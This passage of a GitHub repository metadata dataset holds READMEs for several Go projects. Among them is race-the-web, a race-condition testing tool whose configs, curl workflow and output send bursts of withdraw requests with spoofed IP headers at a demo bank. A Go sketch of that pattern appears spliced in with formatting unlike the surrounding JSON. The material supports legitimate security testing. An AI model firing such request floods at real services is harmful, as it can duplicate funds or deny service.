Having SOCKS in your toolbelt of tricks is always handy and can make hard things surprisingly easy.Last time was I needed to tunnel a request from my development environment into a production VPN to contact a service which had IP access restrictions.On Firefox, your footer is very difficult to read. The font is too light on the background. Hope it is not intentional.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ericm/stonks", "link": "https://github.com/ericm/stonks", "tags": ["stock-market", "stock-data", "stocks", "stock-cli", "cli", "stock-market-data", "terminal-graphics", "go", "golang", "linux", "macos", "graphs", "tracker", "aur", "stock-visualizer", "wtfutil", "curl", "ascii-art", "terminal-based", "hacktoberfest"], "stars": 522, "description": "Stonks is a terminal based stock visualizer and tracker that displays realtime stocks in graph format in a terminal. See how fast your stonks will crash.", "lang": "Go", "repo_lang": "", "readme": "# ![Stonks](./assets/stonks.svg?raw=true)\n\n[![GitHub](https://img.shields.io/github/license/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/blob/master/LICENSE)\n[![GitHub contributors](https://img.shields.io/github/contributors/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/graphs/contributors)\n[![GitHub last commit](https://img.shields.io/github/last-commit/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/commits/master)\n[![GitHub release (latest by date)](https://img.shields.io/github/v/release/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/releases)\n[![AUR version](https://img.shields.io/aur/version/stonks?style=for-the-badge)](https://aur.archlinux.org/packages/stonks/)\n\nStonks is a terminal based stock visualizer and tracker.\n\n## Installation\n\nRequirements: golang >= 1.13\n\n### Manual\n\n1. Clone the repo\n2. Run `make && make install`\n\n### Packages\n\nStonks is available on:\n\n- [The AUR](https://aur.archlinux.org/packages/stonks/). You can install it on arch linux with my other project [yup](https://github.com/ericm/yup): `$ yup -S stonks`\n\n- HomeBrew: `brew install ericm/stonks/stonks`\n\n### Binaries\n\nBinaries are now available for Windows, MacOSX and Linux under each [release](https://github.com/ericm/stonks/releases)\n\n## [Online installationless usage (via curl)](http://stonks.icu)\n\nYou can now access basic stock graphs for passed stock tickers via the stonks HTTPS client (https://stonks.icu).\n\nTry it:\n```\n$ curl -L stonks.icu/amd/ba\n```\n\n## Usage\n\nIt uses Yahoo Finance as a backend so use the ticker format as seen on their website.\n\n```\nDisplays realtime stocks in graph format in a terminal\n\nUsage:\n stonks [flags]\n\nFlags:\n -d, --days int 24 hour period of stocks from X of days ago.\n -e, --extra Include extra pre + post time. (Only works for day)\n -h, --help help for stonks\n -i, --interval string stonks -i X[m|h] (eg 15m, 5m, 1h, 1d) (default \"15m\")\n -n, --name string Optional name for a stonk save\n -r, --remove string Remove an item from favourites\n -s, --save string Add an item to the default stonks command. 
(Eg: -s AMD -n \"Advanced Micro Devices\")\n -t, --theme string Display theme for the chart (Options: \"line\", \"dot\", \"icon\")\n -v, --version stonks version\n -w, --week Display the last week (will set interval to 1d)\n -y, --year Display the last year (will set interval to 5d)\n --ytd Display the year to date (will set interval to 5d)\n```\n\n### `$ stonks`\n\nGives graphs and current value/change of _saved_ stocks.\n![Stonks](./assets/1.png)\n\n### `$ stonks -s AMD -n \"Advanced Micro Devices\"`\n\nAdd a favourite stock to be tracked with `$ stonks`\n\n### `$ stonks -r AMD`\n\nRemove a favourite stock\n\n### `$ stonks AMD`\n\nGives the current stock for each ticker passed that day\n\n![Stonks](./assets/2.png)\n\n### `$ stonks -w AMD`\n\nGives the current stock for each ticker passed _for the past week_\n\n![Stonks](./assets/3.png)\n\n### `$ stonks -d 4 AMD`\n\nGives the current stock for each ticker passed X days ago\n\n![Stonks](./assets/4.png)\n\n## Configuration\n\nThe config file is located at `~/.config/stonks.yml`\n\nYou can change the following options:\n\n```yml\nconfig:\n default_theme: 0 # 0: Line, 1: Dots, 2: Icons\n favourites_height: 12 # Height of the chart in each info panel\n standalone_height: 12\n```\n\n## Usage with wtfutil\n\nYou can use a program such as [wtfutil](https://wtfutil.com/) (On Arch Linux: `yup -S wtfutil`) to make stonks refresh automatically.\nSee the sample `~/.config/wtf/config.yml` provided by [Gideon Wolfe\n](https://github.com/GideonWolfe):\n\n```yml\nwtf:\n colors:\n background: black\n border:\n focusable: darkslateblue\n focused: blue\n normal: gray\n checked: yellow\n highlight:\n fore: black\n back: gray\n rows:\n even: yellow\n odd: white\n grid:\n # How _wide_ the columns are, in terminal characters. In this case we have\n # four columns, each of which are 35 characters wide.\n columns: [33, 33, 33]\n # How _high_ the rows are, in terminal lines. In this case we have four rows\n # that support ten line of text and one of four.\n rows: [20, 20, 20, 20, 20, 20, 20, 20]\n refreshInterval: 1\n\n mods:\n tech:\n type: cmdrunner\n args: [\"tsla\", \"intc\", \"--theme\", \"dot\"]\n cmd: \"stonks\"\n enabled: true\n position:\n top: 0\n left: 0\n height: 2\n width: 3\n refreshInterval: 10\n title: \"\ud83e\udd16 Tech\"\n financial:\n type: cmdrunner\n args: [\"jpm\", \"v\", \"--theme\", \"dot\"]\n cmd: \"stonks\"\n enabled: true\n position:\n top: 2\n left: 0\n height: 2\n width: 3\n refreshInterval: 10\n```\n", "readme_type": "markdown", "hn_comments": "?? Seems locked from read as well> You need permission; Want in? Ask for access, or switch to an account with permission.It was changed to a read only link, not sure why. 
I'd have appreciated addition from the HN folksLeverage should be a column as many companies that are highly levered will not have the resources to outlast this crisis.Interesting sheet.Might be useful to also add columns to show the current PE and also the market vs book value.Actual remarks by Boston Fed's Rosengren here:https://www.bostonfed.org/news-and-events/speeches/2019/asse...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "emicklei/proto", "link": "https://github.com/emicklei/proto", "tags": ["protobuf", "parser", "proto3", "formatter", "proto2", "golang-package", "protocol-buffers", "protobuf-parser"], "stars": 522, "description": "parser for Google ProtocolBuffers definition", "lang": "Go", "repo_lang": "", "readme": "# proto\n\n[![Build Status](https://api.travis-ci.com/emicklei/proto.svg?branch=master)](https://travis-ci.com/github/emicklei/proto)\n[![Go Report Card](https://goreportcard.com/badge/github.com/emicklei/proto)](https://goreportcard.com/report/github.com/emicklei/proto)\n[![GoDoc](https://pkg.go.dev/badge/github.com/emicklei/proto)](https://pkg.go.dev/github.com/emicklei/proto)\n[![codecov](https://codecov.io/gh/emicklei/proto/branch/master/graph/badge.svg)](https://codecov.io/gh/emicklei/proto)\n\nPackage in Go for parsing Google Protocol Buffers [.proto files version 2 + 3](https://developers.google.com/protocol-buffers/docs/reference/proto3-spec)\n\n### install\n\n go get -u -v github.com/emicklei/proto\n\n### usage\n\n\tpackage main\n\n\timport (\n\t\t\"fmt\"\n\t\t\"os\"\n\n\t\t\"github.com/emicklei/proto\"\n\t)\n\n\tfunc main() {\n\t\treader, _ := os.Open(\"test.proto\")\n\t\tdefer reader.Close()\n\n\t\tparser := proto.NewParser(reader)\n\t\tdefinition, _ := parser.Parse()\n\n\t\tproto.Walk(definition,\n\t\t\tproto.WithService(handleService),\n\t\t\tproto.WithMessage(handleMessage))\n\t}\n\n\tfunc handleService(s *proto.Service) {\n\t\tfmt.Println(s.Name)\n\t}\n\n\tfunc handleMessage(m *proto.Message) {\n\t\tlister := new(optionLister)\n\t\tfor _, each := range m.Elements {\n\t\t\teach.Accept(lister)\n\t\t}\n\t\tfmt.Println(m.Name)\n\t}\n\n\ttype optionLister struct {\n\t\tproto.NoopVisitor\n\t}\n\n\tfunc (l optionLister) VisitOption(o *proto.Option) {\n\t\tfmt.Println(o.Name)\n\t}\n\n### validation\n\nCurrent parser implementation is not completely validating `.proto` definitions.\nIn many but not all cases, the parser will report syntax errors when reading unexpected charaters or tokens.\nUse some linting tools (e.g. https://github.com/uber/prototool) or `protoc` for full validation.\n\n### contributions\n\nSee [proto-contrib](https://github.com/emicklei/proto-contrib) for other contributions on top of this package such as protofmt, proto2xsd and proto2gql.\n[protobuf2map](https://github.com/emicklei/protobuf2map) is a small package for inspecting serialized protobuf messages using its `.proto` definition.\n\n\u00a9 2017-2022, [ernestmicklei.com](http://ernestmicklei.com). MIT License. 
Contributions welcome.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/kwok", "link": "https://github.com/kubernetes-sigs/kwok", "tags": ["k8s-sig-scheduling", "kubernetes", "simulator", "docker", "golang", "mulit-cluster", "nerdctl"], "stars": 523, "description": "Kubernetes WithOut Kubelet - Simulates thousands of Nodes and Clusters.", "lang": "Go", "repo_lang": "", "readme": "# `KWOK` (`K`ubernetes `W`ith`O`ut `K`ubelet)\n\n\n\n[KWOK] is a toolkit that enables setting up a cluster of thousands of Nodes in seconds.\nUnder the scene, all Nodes are simulated to behave like real ones, so the overall approach employs\na pretty low resource footprint that you can easily play around on your laptop.\n\nSo far we provide two tools:\n\n- **kwok:** Core of this repo. It simulates thousands of fake Nodes.\n- **kwokctl:** A CLI to facilitate creating and managing clusters simulated by Kwok.\n\nPlease see [our website] for more in-depth information.\n\n\n\n## Community\n\nSee our own [contributor guide] and the Kubernetes [community page].\n\n### Code of conduct\n\nParticipation in the Kubernetes community is governed by the [Kubernetes Code of Conduct][code of conduct].\n\n[KWOK]: https://sigs.k8s.io/kwok\n[our website]: https://kwok.sigs.k8s.io\n[community page]: https://kubernetes.io/community/\n[contributor guide]: https://kwok.sigs.k8s.io/docs/contributing/getting-started\n[code of conduct]: https://github.com/kubernetes-sigs/kwok/blob/main/code-of-conduct.md\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TheHackerDev/race-the-web", "link": "https://github.com/TheHackerDev/race-the-web", "tags": ["security-tools", "race-conditions", "security", "appsec", "devops-tools", "infosec"], "stars": 521, "description": "Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline.", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/github.com/aaronhnatiw/race-the-web)](https://goreportcard.com/report/github.com/aaronhnatiw/race-the-web) [![Build Status](https://travis-ci.org/aaronhnatiw/race-the-web.svg?branch=master)](https://travis-ci.org/aaronhnatiw/race-the-web)\n\n# Race The Web (RTW)\n\nTests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) *simultaneously*, and then compares the responses from the server for uniqueness. Includes a number of configuration options.\n\n## UPDATE: Now CI Compatible!\n\nVersion 2.0.0 now makes it easier than ever to integrate RTW into your continuous integration pipeline (\u00e0 la [Jenkins](https://jenkins.io/), [Travis](https://travis-ci.org/), or [Drone](https://github.com/drone/drone)), through the use of an easy to use HTTP API. 
More information can be found in the **Usage** section below.\n\n## Watch The Talk\n\n[![Racing the Web - Hackfest 2016](https://img.youtube.com/vi/4T99v957I0o/0.jpg)](https://www.youtube.com/watch?v=4T99v957I0o)\n\n_Racing the Web - Hackfest 2016_\n\nSlides: https://www.slideshare.net/AaronHnatiw/racing-the-web-hackfest-2016\n\n## Usage\n\nWith configuration file\n\n```sh\n$ race-the-web config.toml\n```\n\nAPI\n\n```sh\n$ race-the-web\n```\n\n### Configuration File\n\n**Example configuration file included (_config.toml_):**\n\n```toml\n# Sample Configurations\n\n# Send 100 requests to each target\ncount = 100\n# Enable verbose logging\nverbose = true\n# Use an http proxy for all connections\nproxy = \"http://127.0.0.1:8080\"\n\n# Specify the first request\n[[requests]]\n # Use the GET request method\n method = \"GET\"\n # Set the URL target. Any valid URL is accepted, including ports, https, and parameters.\n url = \"https://example.com/pay?val=1000\"\n # Set the request body.\n # body = \"body=text\"\n # Set the cookie values to send with the request to this target. Must be an array.\n cookies = [\"PHPSESSIONID=12345\",\"JSESSIONID=67890\"]\n # Set custom headers to send with the request to this target. Must be an array.\n headers = [\"X-Originating-IP: 127.0.0.1\", \"X-Remote-IP: 127.0.0.1\"]\n # Follow redirects\n redirects = true\n\n# Specify the second request\n[[requests]]\n # Use the POST request method\n method = \"POST\"\n # Set the URL target. Any valid URL is accepted, including ports, https, and parameters.\n url = \"https://example.com/pay\"\n # Set the request body.\n body = \"val=1000\"\n # Set the cookie values to send with the request to this target. Must be an array.\n cookies = [\"PHPSESSIONID=ABCDE\",\"JSESSIONID=FGHIJ\"]\n # Set custom headers to send with the request to this target. Must be an array.\n headers = [\"X-Originating-IP: 127.0.0.1\", \"X-Remote-IP: 127.0.0.1\"]\n # Do not follow redirects\n redirects = false\n```\n\nTOML Spec: https://github.com/toml-lang/toml\n\n### API\n\nSince version 2.0.0, RTW now has a full-featured API, which allows you to easily integrate it into your continuous integration (CI) tool of choice. This means that you can quickly and easily test your web application for race conditions automatically whenever you commit your code.\n\nThe API works through a simple set of HTTP calls. You provide input in the form of JSON and receive a response in JSON. The 3 API endpoints are as follows:\n\n- `POST` `http://127.0.0.1:8000/set/config`: Provide configuration data (in JSON format) for the race condition test you want to run (examples below).\n- `GET` `http://127.0.0.1:8000/get/config`: Fetch the current configuration data. Data is returned in a JSON response.\n- `POST` `http://127.0.0.1:8000/start`: Begin the race condition test using the configuration that you have already provided. All findings are returned back in JSON output.\n\n#### Example JSON configuration (sent to `/set/config` using a `POST` request)\n\n```json\n{\n \"count\": 100,\n \"verbose\": false,\n \"requests\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"cookies\": [\n \"sessionId=dutwJx8kyyfXkt9tZbboT150TjZoFuEZGRy8Mtfpfe7g7UTPybCZX6lgdRkeOjQA\"\n ],\n \"body\": \"amount=1\",\n \"redirects\": true\n }\n ]\n}\n```\n\n#### Example workflow using curl\n\n\n1. 
Send the configuration data\n\n```sh\n$ curl -d '{\"count\":100,\"verbose\":false,\"requests\":[{\"method\":\"POST\",\"url\":\"http://racetheweb.io/bank/withdraw\",\"cookies\":[\"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"],\"body\":\"amount=1\",\"redirects\":true}]}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:8000/set/config\n\n{\"message\":\"configuration saved\"}\n```\n\n2. Retrieve the configuration data for validation\n\n```sh\n$ curl -X GET http://127.0.0.1:8000/get/config\n\n{\"count\":100,\"verbose\":false,\"proxy\":\"\",\"requests\":[{\"method\":\"POST\",\"url\":\"http://racetheweb.io/bank/withdraw\",\"body\":\"amount=1\",\"cookies\":[\"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"],\"headers\":null,\"redirects\":true}]}\n```\n\n3. Start the race condition test\n\n```sh\n$ curl -X POST http://127.0.0.1:8000/start\n```\n\nResponse (expanded for visibility):\n\n```JSON\n[\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
\\n
                [page text, tags stripped: Welcome to SpeedBank, International / You have successfully withdrawn $1 / Balance: 9999 / usage instructions and footer (Aaron Hnatiw 2017) omitted]
\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:29 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 1\n },\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
\\n
                [page text, tags stripped: Welcome to SpeedBank, International / You have successfully withdrawn $1 / Balance: 9998 / usage instructions and footer (Aaron Hnatiw 2017) omitted]
\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:30 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 1\n },\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
\\n
                [page text, tags stripped: Welcome to SpeedBank, International / You have successfully withdrawn $1 / Balance: 9997 / usage instructions and footer (Aaron Hnatiw 2017) omitted]
\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:36 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 98\n }\n]\n```\n\n## Binaries\n\nThe program has been written in Go, and as such can be compiled to all the common platforms in use today. The following architectures have been compiled, and can be found in the [releases](https://github.com/insp3ctre/race-the-web/releases) tab:\n\n- Windows amd64\n- Windows 386\n- Linux amd64\n- Linux 386\n- OSX amd64\n- OSX 386\n\n## Compiling\n\nFirst, make sure you have Go installed on your system. If you don't you can follow the install instructions for your operating system of choice here: https://golang.org/doc/install.\n\nBuild a binary for your current CPU architecture\n\n```sh\n$ make build\n```\n\nBuild for all major CPU architectures (see [Makefile](https://github.com/insp3ctre/race-the-web/blob/master/Makefile) for details) at once\n\n```sh\n$ make\n```\n\n### Dep\n\nThis project uses [Dep](https://github.com/golang/dep) for dependency management. All of the required files are kept in the `vendor` directory, however if you are getting errors related to dependencies, simply download Dep\n\n```sh\n$ go get -u github.com/golang/dep/cmd/dep\n```\n\nand run the following command from the RTW directory in order to download all dependencies\n\n```sh\n$ dep ensure\n```\n\n### Go 1.7 and newer are supported\n\nBefore 1.7, the `encoding/json` package's `Encoder` did not have a method to escape the `&`, `<`, and `>` characters; this is required in order to have a clean output of full HTML pages when running these race tests. _If this is an issue for your test cases, please submit a [new issue](https://github.com/insp3ctre/race-the-web/issues) indicating as such, and I will add a workaround (just note that any output from a server with those characters will come back with unicode escapes instead)._ Here are the relevant release details from Go 1.7: https://golang.org/doc/go1.7#encoding_json.\n\n## The Vulnerability\n\n> A race condition is a flaw that produces an unexpected result when the timing of actions impact other actions. An example may be seen on a multithreaded application where actions are being performed on the same data. Race conditions, by their very nature, are difficult to test for.\n> - [OWASP](https://www.owasp.org/index.php/Testing_for_Race_Conditions_(OWASP-AT-010))\n\nRace conditions are a well known issue in software development, especially when you deal with fast, multi-threaded languages.\n\nHowever, as network speeds get faster and faster, web applications are becoming increasingly vulnerable to race conditions. Often because of legacy code that was not created to handle hundreds or thousands of simultaneous requests for the same function or resource.\n\nThe problem can often only be discovered when a fast, multi-threaded language is being used to generate these requests, using a fast network connection; at which point it becomes a network and logic race between the client application and the server application.\n\nThat is where **Race The Web** comes in. 
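Conceptually, the attack is just a tightly synchronized burst of identical requests. A minimal, hypothetical Go sketch of that pattern (not the tool's actual implementation; it reuses the bank demo endpoint from the examples above and omits session handling):

```go
package main

import (
	"fmt"
	"net/http"
	"strings"
	"sync"
)

func main() {
	// Illustration only: hold 100 identical requests at a starting gate,
	// release them simultaneously, then inspect the responses.
	const n = 100
	target := "http://racetheweb.io/bank/withdraw" // bank demo endpoint from the examples above

	start := make(chan struct{})
	var wg sync.WaitGroup
	statuses := make([]int, n)

	for i := 0; i < n; i++ {
		wg.Add(1)
		go func(i int) {
			defer wg.Done()
			<-start // block until every goroutine is ready
			resp, err := http.Post(target, "application/x-www-form-urlencoded",
				strings.NewReader("amount=1"))
			if err != nil {
				statuses[i] = -1
				return
			}
			resp.Body.Close()
			statuses[i] = resp.StatusCode
		}(i)
	}

	close(start) // fire all requests at (nearly) the same instant
	wg.Wait()
	fmt.Println(statuses) // compare responses for unexpected differences
}
```

The tool layers configuration, response comparison, and the JSON/API reporting shown above on top of this basic pattern.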
This program aims to discover race conditions in web applications by sending a large amount of requests to a specific endpoint at the same time. By doing so, it may invoke unintended behaviour on the server, such as the duplication of user information, coupon codes, bitcoins, etc.\n\n**Warning:** Denial of service may be an unintended side-effect of using this application, so please be careful when using it, and always perform this kind of testing with the explicit permission of the server owner and web application owner.\n\nCredit goes to [Josip Franjkovi\u0107](https://twitter.com/josipfranjkovic) for his [excellent article on the subject](https://www.josipfranjkovic.com/blog/race-conditions-on-web), which introduced me to this problem.\n\n## Why Go\n\nThe [Go programming language](https://golang.org/) is perfectly suited for the task, mainly because it is *so damned fast*. Here are a few reasons why:\n\n- Concurrency: Concurrency primitives are built into the language itself, and extremely easy to add to any Go program. Threading is [handled by the Go runtime scheduler](https://morsmachine.dk/go-scheduler), and not by the underlying operating system, which allows for some serious performance optimizations when it comes to concurrency.\n- Compiled: *Cross-compiles* to [most modern operating systems](https://golang.org/doc/install/source#environment); not slowed down by an interpreter or virtual machine middle-layer ([here are some benchmarks vs Java](https://benchmarksgame.alioth.debian.org/u64q/go.html)). (Oh, and did I mention that the binaries are statically compiled?)\n- Lightweight: Only [25 keywords](https://golang.org/ref/spec#Keywords) in the language, and yet still almost everything can be done using the standard library.\n\nFor more of the nitty-gritty details on why Go is so fast, see [Dave Cheney](https://twitter.com/davecheney)'s [excellent talk on the subject](http://dave.cheney.net/2014/06/07/five-things-that-make-go-fast), from 2014.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fwhappy/mahjong", "link": "https://github.com/fwhappy/mahjong", "tags": [], "stars": 521, "description": "\u9ebb\u5c06\u7b97\u6cd5\u6c47\u603b", "lang": "Go", "repo_lang": "", "readme": "# \u9ebb\u5c06\u7b97\u6cd5\u5c01\u88c5\n\n* \u6b64\u5e93\u4e3b\u8981\u5305\u62ec\u4e86\n\t* \u724c\u5899\u7b97\u6cd5\n\t* \u542c\u724c\u7b97\u6cd5\n\t* \u80e1\u724c\u7b97\u6cd5\n\t* \u51fa\u724c\u63a8\u8350\u7b97\u6cd5\n\t* \u6269\u5c55\u73a9\u6cd5\u8bbe\u7f6e\n\n* \u9ebb\u5c06\u724c\u7684\u5b9a\u4e49\n\n~~~\n\t1 ~ 9 : \u4e00\u4e07 ~ 9\u4e07\n\t11 ~ 19 : \u4e00\u6761 ~ 9\u6761\n\t21 ~ 29 : \u4e00\u7b52 ~ 9\u7b52\n\t31 ~ 34 : \u4e1c\u5357\u897f\u5317\u98ce\n\t41 : \u53d1\u8d22\n\t42 : \u7ea2\u4e2d\n\t43 : \u767d\u677f\n\t51 ~ 54 : \u6625\u590f\u79cb\u51ac\n\t61 ~ 64 : \u56db\u79cd\u82b1\u8272\n~~~\n\n* \u724c\u5899\n\n~~~\nimport \"github.com/fwhappy/mahjong/wall\"\n\nfunc main() {\n\t// \u521d\u59cb\u5316\u724c\u5899\n\tw := wall.NewWall()\n\tw.SetTiles([]int{1,1,1,1,2,2,2,2})\n\t\n\t// \u6d17\u724c\n\tw.Shuffle()\n\t\n\t// \u4ece\u524d\u9762\u6293\u4e00\u5f20\n\twall.ForwardDraw()\n\t\n\t// \u4ece\u524d\u9762\u6293\u591a\u5f20\n\twall.ForwardDrawMulti()\n\t\n\t// \u4ece\u540e\u9762\u6293\u4e00\u5f20\n\twall.BackwardDraw()\n\t\n\t// \u662f\u5426\u5df2\u6293\u5b8c\n\twall.IsAllDrawn()\n}\n~~~\n\n* \u80e1\u724c\u7b97\u6cd5\n\n~~~\n\timport \"github.com/fwhappy/mahjong/win\"\n\t\n\tfunc main() {\n\t\t// \u624b\u724c\n\t\thandTiles 
:= []int{1,2,3,4,5,6,7,7}\n\t\t// \u660e\u724c\n\t\tshowTiles := []int{}\n\t\t\n\t\t// \u6839\u636e\u7528\u6237\u624b\u724c\u548c\u660e\u724c\u6765\u5224\u65ad\u7528\u6237\u662f\u5426\u53ef\u4ee5\u80e1\u724c\n\t\tisWin := win.CanWin(handTiles, showTiles)\n\t}\n~~~\n\n* \u542c\u724c\u7b97\u6cd5\n\n~~~\n\timport \"github.com/fwhappy/mahjong/ting\"\n\t\n\tfunc main() {\n\t\t// \u6839\u636e\u624b\u724c\u3001\u5f03\u724c\u8ba1\u7b97\u5f53\u524d\u724c\u578b\uff0c\u6240\u6709\u542c\u724c\u7684\u53ef\u80fd\n\t\t// \u8fd4\u56demap[int][]int, \u8868\u793a\u6253\u51fakey\uff0c\u80fd\u80e1value\u4e2d\u7684\u8fd9\u4e9b\u724c\n\t\t// \u624b\u724c\n\t\thandTiles := []int{1,2,3,4,5,6,7,7}\n\t\t// \u660e\u724c\n\t\tshowTiles := []int{}\n\t\tting.GetTingMap(handTiles, showTiles)\n\t\t\n\t\t// \u68c0\u6d4b\u5f53\u524d\u624b\u724c\u3001\u5f03\u724c\u662f\u5426\u5df2\u505c\u724c\n\t\tting.CanTing(handTiles, showTiles)\n\t}\n~~~\n\n* \u9009\u724c\u7b97\u6cd5\uff08AI\uff09\n\n~~~\n\timport \"github.com/fwhappy/mahjong/suggest\"\n\t\n\tfunc main() {\n\t\tms := suggest.NewMSelector()\n\t\t\n\t\t// \u6839\u636e\u7528\u6237\u624b\u724c\u3001\u660e\u724c\uff0c\u5f03\u724c\uff08\u6240\u6709\u4eba\u7684\uff09\n\t\t// \u8ba1\u7b97\u51fa\u7528\u6237\u5f53\u524d\u5e94\u8be5\u51fa\u4ec0\u4e48\u724c\n\t\t\n\t\t// \u624b\u724c\n\t\thandTiles := []int{1,2,3,4,5,6,7,7}\n\t\t// \u660e\u724c\n\t\tshowTiles := []int{}\n\t\t// \u5f03\u724c\n\t\tdiscardTiles := []int{}\n\t\t\n\t\t// \u8bbe\u7f6e\u53c2\u6570\n\t\tms.SetAILevel(aiLevel) // AI\u7b49\u7ea7\n\t\tms.SetLack(lack)\t// \u7f3a\u7684\u724c\n\t\tms.SetHandTilesSlice(handTiles)\n\t\tms.SetShowTilesSlice(showTiles)\n\t\tms.SetDiscardTilesSlice(discardTiles)\n\t\t// \u9009\u724c\n\t\ttile := ms.GetSuggest()\n\t}\n~~~\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hetznercloud/hcloud-cloud-controller-manager", "link": "https://github.com/hetznercloud/hcloud-cloud-controller-manager", "tags": ["kubernetes", "hetzner", "hcloud", "hetzner-cloud"], "stars": 521, "description": "Kubernetes cloud-controller-manager for Hetzner Cloud", "lang": "Go", "repo_lang": "", "readme": "# Kubernetes Cloud Controller Manager for Hetzner Cloud\n\n[![GitHub Actions status](https://github.com/hetznercloud/hcloud-cloud-controller-manager/workflows/Run%20tests/badge.svg)](https://github.com/hetznercloud/hcloud-cloud-controller-manager/actions)\n\nThe Hetzner Cloud cloud controller manager integrates your Kubernets\ncluster with the Hetzner Cloud API. 
Read more about kubernetes cloud\ncontroller managers in the [kubernetes\ndocumentation](https://kubernetes.io/docs/tasks/administer-cluster/running-cloud-controller/).\n\n## Features\n\n* **instances interface**: adds the server type to the\n `beta.kubernetes.io/instance-type` label, sets the external ipv4 and\n ipv6 addresses and deletes nodes from Kubernetes that were deleted\n from the Hetzner Cloud.\n* **zones interface**: makes Kubernetes aware of the failure domain of\n the server by setting the `failure-domain.beta.kubernetes.io/region`\n and `failure-domain.beta.kubernetes.io/zone` labels on the node.\n* **Private Networks**: allows to use Hetzner Cloud Private Networks for\n your pods traffic.\n* **Load Balancers**: allows to use Hetzner Cloud Load Balancers with\n Kubernetes Services\n\n## Example\n\n```yaml\napiVersion: v1\nkind: Node\nmetadata:\n annotations:\n flannel.alpha.coreos.com/backend-data: '{\"VtepMAC\":\"06:b3:ee:88:92:36\"}'\n flannel.alpha.coreos.com/backend-type: vxlan\n flannel.alpha.coreos.com/kube-subnet-manager: \"true\"\n flannel.alpha.coreos.com/public-ip: 78.46.208.178\n node.alpha.kubernetes.io/ttl: \"0\"\n volumes.kubernetes.io/controller-managed-attach-detach: \"true\"\n creationTimestamp: 2018-01-24T15:59:45Z\n labels:\n beta.kubernetes.io/arch: amd64\n beta.kubernetes.io/instance-type: cx11 # <-- server type\n beta.kubernetes.io/os: linux\n topology.kubernetes.io/region: fsn1 # <-- location\n topology.kubernetes.io/zone: fsn1-dc8 # <-- datacenter\n kubernetes.io/hostname: master\n node-role.kubernetes.io/master: \"\"\n name: master\n resourceVersion: \"183932\"\n selfLink: /api/v1/nodes/master\n uid: 98acdedc-011f-11e8-9ed3-9600000780bf\nspec:\n externalID: master\n podCIDR: 10.244.0.0/24\n providerID: 